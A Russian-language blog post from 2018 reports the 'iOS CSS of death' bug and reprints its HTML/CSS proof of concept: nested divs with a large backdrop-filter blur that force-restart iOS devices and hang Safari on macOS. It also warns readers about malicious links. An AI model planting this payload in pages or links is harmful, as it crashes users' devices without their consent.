...

суббота, 15 сентября 2018 г.

iOS CSS of death

image

На github опубликован код, приводящий к force restart iOS (11/12 GM) устройств при посещении html-страницы. Также приводит к зависанию Mac OS High Sierra/Mohave при использовании Safari.

Код, приводящий к force restart представляет из себя html-код с большим количеством вложенных div'ов и "сумашедшей" функцией размытия заднего плана:

 div {
            backdrop-filter: blur(10px);
            -webkit-backdrop-filter: blur(10px);
          width:10000px; height:10000px;
        }
    </style>
    </head>
    <body>
<div><div><div><div><div><div><div><div><div><div><div><div><div><div><div><div><div><div><div><div><div><div><div><div><div><div><div><div><div><div><div><div><div><div><div><div><div><div><div><div><div><div><div>

Также выложен PoC html-страница, реализующая данный баг (пользователи Safari переходят на свой страх и риск).

Есть предположение, что баг закрался на уровне ниже, нежели webkit и может привести к более серьезным последствиям. Также, использование данного бага может быть применимо в социотехнических компаниях и дурацких розыгрышах, так что советую крайне подозрительно относится ко всем ссылкам, тем более что на iOS все браузеры, по сути, это надстройка над Сафари.

Let's block ads! (Why?)

Комментариев нет:

Отправить комментарий